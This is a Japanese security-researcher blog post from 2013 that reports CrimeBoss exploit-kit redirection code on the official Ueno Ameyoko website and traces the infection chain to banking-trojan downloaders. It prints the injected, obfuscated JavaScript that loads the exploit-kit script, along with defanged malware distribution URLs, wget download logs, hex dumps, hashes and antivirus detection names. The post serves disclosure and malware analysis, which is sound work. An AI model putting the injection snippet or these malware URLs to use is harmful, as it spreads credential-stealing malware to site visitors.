月曜日, 1月 28, 2013

#OCJP-085: 上野アメ横公式ホームページに「CrimeBoss」感染ウール経由のバンキングトロイを発見!

上野アメ横公式ホームページに「CrimeBoss(マルウェア感染ツール)」のマルウェア感染
リダイレクションコードのコードを発見しました。
証拠は下記となりますが、コードを早めに削除して下さい。
それとウェブサイトのログイン情報を変更し、サーバの脆弱性を直してお願いします。

上記外にあるマルウェアjavascriptを実行されます、そのjavascriptは↓

//ダウンロード証拠
--2013-01-28 19:36:16--  hxxp://abrahamspath,org.uk/cb.php
Resolving abrahamspath.org.uk... seconds 0.00, 50.87.25.110
Caching abrahamspath.org.uk => 50.87.25.110
Connecting to abrahamspath.org.uk|50.87.25.110|:80... seconds 0.00, connected.
  :
GET /cb.php HTTP/1.0
Host: abrahamspath.org.uk
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Date: Mon, 28 Jan 2013 10:36:17 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=i9h9an5p471b2epoqdtru42ha7; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Length: unspecified [text/html]
Saving to: `cb.php'
// 中身のコードは↓ ↑マークされたURLは「CrimeBossのExploitKit感染URL」 現在海外には流行っているマルウェア感染ツール、リファレンス→ [クリック] さて、このURLをJavaがインストールされているPCでアクセスしたら302が出て、 ユーザが下記のURLへ飛ばされて↓
boyssuitsonline、com/jex/index.php?setup=d 
そして、下記の別のjavascriptが実行されます…、ので、
if(navigator.javaEnabled())
  {
    document.write('<sc' + 'ri' + 'pt src=
    "h00p://boyssuitsonline,com/jex/index.php?setup=d&s=2&r=' + Math.floor(100000 +
    (Math.random()*999999 + 1)) + '" type="text/javascript"
    charset="iso-8859-1">
    </sc' + 'ri' + 'pt>'); }
ここでexploit-kitのマルウェア感染javascriptが実行されてしまいます。 テキストのコードはこちた→[PASTEBIN] ←備考:感染不可能な環境! そして下記のURLに保存されたマルウェアファイルがダウンロード↓
hxxxp://patuamusic,com,br/app/rh・exe
確認したら未だ感染可能な状況ですね↓
--2013-01-28 20:23:51--  hxxp://patuamusic.com,br/app/rh・exe;exe
Resolving patuamusic.com.br... seconds 0.00, 187・108.192.54
Caching patuamusic.com.br => 187・108.192.54
Connecting to patuamusic.com.br|187・108.192.54|:80... seconds 0.00, connected.
GET /app/rh.exe;exe HTTP/1.0
Referer: http://ameyoko.net/index.html
Host: patuamusic.com.br
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
  :
HTTP request sent, awaiting response.
HTTP/1.0 200 OK
Date: Mon, 28 Jan 2013 11:27:28 GMT
さっきちゃんとダウンロードしましたの証拠は↓ 情報↓
Packer                   : BobSoft Mini Delphi -> BoB / BobSoft 
作った日付け             : 2013-01-24 14:09:50
感染ターゲットマシン     : 0x14C (Intel 386)
Entry point address      : 0x00057724
MIMEType                 : application/octet-stream
Subsystem                : Windows GUI
MachineType              : Intel 386 or later, and compatibles
TimeStamp                : 2013:01:24 14:09:50+00:00
FileType                 : Win32 EXE
PEType                   : PE32
CodeSize                 : 351744
LinkerVersion            : 2.25
EntryPoint               : 0x57724
InitializedDataSize      : 59392
SubsystemVersion         : 4.0
ImageVersion             : 0.0
OSVersion                : 4.0
HEX↓
0010   B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00    ................
0040   BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90    ........!..L.!..
0050   54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73    This program mus
0060   74 20 62 65 20 72 75 6E 20 75 6E 64 65 72 20 57    t be run under W
0070   69 6E 33 32 0D 0A 24 37 00 00 00 00 00 00 00 00    in32..$7........
0080   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0090   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
00A0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
00B0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
 :          :
短くにすると、ダウンロードされたファイルはトロイダウンローダーです。 銀行/BANKING個人情報を盗む物ですね。 ウイルストータルに確認したら検知率はこんな感じで↓
MD5:  87f4774038f4ba4a119cd35e523681b3
File size:  402.5 KB ( 412160 bytes )
File name:  rh.exe
File type:  Win32 EXE
Tags:  peexe bobsoft
Detection ratio:  23 / 46
Analysis date:  2013-01-25 10:42:19 UTC ( 3 日 ago ) 
URL: https://www.virustotal.com/file/f7551a236daa63dcf02847037fe680b4f5edc8494b30ebe0ae01cb9420b4c194/analysis/

マルウェア名↓
MicroWorld-eScan         : Gen:Variant.Graftor.50132
Malwarebytes             : Trojan.Inject.DF
ESET-NOD32               : a variant of Win32/Injector.RRV
TrendMicro-HouseCall     : TROJ_GEN.R4AZ4AO
Avast                    : Win32:Malware-gen
Kaspersky                : Trojan.Win32.Jorik.Vobfus.gkyo
BitDefender              : Gen:Variant.Graftor.50132
Comodo                   : UnclassifiedMalware
F-Secure                 : Gen:Variant.Graftor.50132
DrWeb                    : Win32.HLLW.Autoruner1.30735
VIPRE                    : Trojan.Win32.Generic!BT
AntiVir                  : TR/Delf.Inject.412160.4
TrendMicro               : TROJ_GEN.R4AZ4AO
McAfee-GW-Edition        : Heuristic.LooksLike.Win32.Suspicious.I
Sophos                   : Mal/Behav-058
Jiangmin                 : Trojan/Jorik.jday
Kingsoft                 : Win32.Troj.Jorik.gk.(kcloud)
Microsoft                : VirTool:Win32/DelfInject.gen!X
GData                    : Gen:Variant.Graftor.50132
VBA32                    : suspected of Trojan-Dropper.Agent.109
Ikarus                   : Virus.Win32.DelfInject
Fortinet                 : W32/Injector.fam!tr
Panda                    : W32/Vobfus.GEP.worm
このマルウェアが実行されたら下記のダウンロードが始まります↓
METHOD : TCP HTTP/1.1
TYPE: GET
URL:  hxxp://sonhodoseu・dominiotemporario.com/fugi/Instal.teaz
IP:PORT: 187.17.98.153:80
UA:   Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
ともかく、ダウンロードしました↓
--2013-01-28 19:44:10--  hxxp://sonhodoseu.dominiotemporario・com/fugi/Instal.teaz
Resolving sonhodoseu,dominiotemporario.com... seconds 0.00, 187・17.98.153
Caching sonhodoseu,dominiotemporario.com => 187,17.98.153
Connecting to sonhodoseu,dominiotemporario.com|187,17.98・153|:80... seconds 0.00, connected.
GET /fugi/Instal.teaz HTTP/1.0
Host: sonhodoseu,dominiotemporario.com
 :
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Mon, 28 Jan 2013 10:44:11 GMT
Content-Type: text/plain
Content-Length: 1155072
Connection: keep-alive
Keep-Alive: timeout=15
Server: Apache
Last-Modified: Sat, 26 Jan 2013 15:17:14 GMT
ETag: "c1d8051-11a000-4d43289e85280"
Accept-Ranges: bytes
200 OK
Registered socket 1896 for persistent reuse.
Length: 1155072 (1.1M) [text/plain]
Saving to: `Instal.teaz'
2013-01-28 19:44:41 (38.4 KB/s) - `Instal.teaz' saved [1155072/1155072]
また別のマルウェアが保存されます。 ファイル名は「Instal.teaz」ですけどPEファイルですね。 例えファイル名がInstal.exeにしたら見た目は下記のように↓ 情報↓
Packer                   : BobSoft Mini Delphi -> BoB / BobSoft 
作った日付け             : 1992-06-19 22:22:17
感染ターゲットマシン     : 0x14C (Intel 386)
Entry point address      : 0x000E7CC0
MIMEType                 : application/octet-stream
Subsystem                : Windows GUI
MachineType              : Intel 386 or later, and compatibles
TimeStamp                : 1992:06:19 23:22:17+01:00
FileType                 : Win32 EXE
PEType                   : PE32
CodeSize                 : 945664
LinkerVersion            : 2.25
EntryPoint               : 0xe7cc0
InitializedDataSize      : 208384
SubsystemVersion         : 4.0
ImageVersion             : 0.0
OSVersion                : 4.0
Hex:
0000   4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00    MZP.............
0010   B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00    ................
0040   BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90    ........!..L.!..
0050   54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73    This program mus
0060   74 20 62 65 20 72 75 6E 20 75 6E 64 65 72 20 57    t be run under W
0070   69 6E 33 32 0D 0A 24 37 00 00 00 00 00 00 00 00    in32..$7........
 :                        :
本件のマルウェアはbankingトロイで、 持っている機能はダウンローダー、スパイウェア、ナックドアーですね。 ウイルストータルに確認しましたら下記の情報が出ます↓
MD5:  b8c677f803acd15dff5bae284083c8a0
File size:  1.1 MB ( 1155072 bytes )
File name:  Instal.exe
File type:  Win32 EXE
Detection ratio:  26 / 46
Analysis date:  2013-01-28 11:54:01 UTC ( 0 分 ago ) 
URL:   https://www.virustotal.com/file/9a2a326e99b47c7f2a0bdfb97ffa1068f80dca65a42caa1d84ee65ff8212d3d0/analysis/1359374041/

マルウェア名↓
MicroWorld-eScan         : Gen:Variant.Graftor.54880
McAfee                   : Artemis!B8C677F803AC
Malwarebytes             : Trojan.Banker
Symantec                 : Trojan.Gen
Norman                   : Troj_Generic.HAOJY
ESET-NOD32               : a variant of Win32/Spy.Banker.YVN
TrendMicro-HouseCall     : TROJ_GEN.R47H1AR
Avast                    : Win32:Malware-gen
eSafe                    : Win32.Trojan
Kaspersky                : Trojan-Downloader.Win32.Banload.ccft
BitDefender              : Gen:Variant.Graftor.54880
Comodo                   : UnclassifiedMalware
F-Secure                 : Gen:Variant.Graftor.54880
DrWeb                    : Trojan.PWS.Banker1.8451
VIPRE                    : Trojan.Win32.Generic!BT
AntiVir                  : TR/Spy.Banker.XX
McAfee-GW-Edition        : Artemis!B8C677F803AC
Emsisoft                 : Gen:Trojan.Heur.DP.gHW@a4WDOkjO (B)
GData                    : Gen:Variant.Graftor.54880
AhnLab-V3                : Downloader/Win32.Banload
PCTools                  : Trojan.Gen
Rising                   : Suspicious
Ikarus                   : Trojan-Banker.Win32.Banker
Fortinet                 : W32/Banload.CCFT!tr.dldr
AVG                      : Downloader.Banload.CHSZ
Panda                    : Trj/CI.A
----
ゼロデイ・ジャパン
http://0day.jp
マルウェア研究所
アドリアン・ヘンドリック

0 件のコメント:

コメントを投稿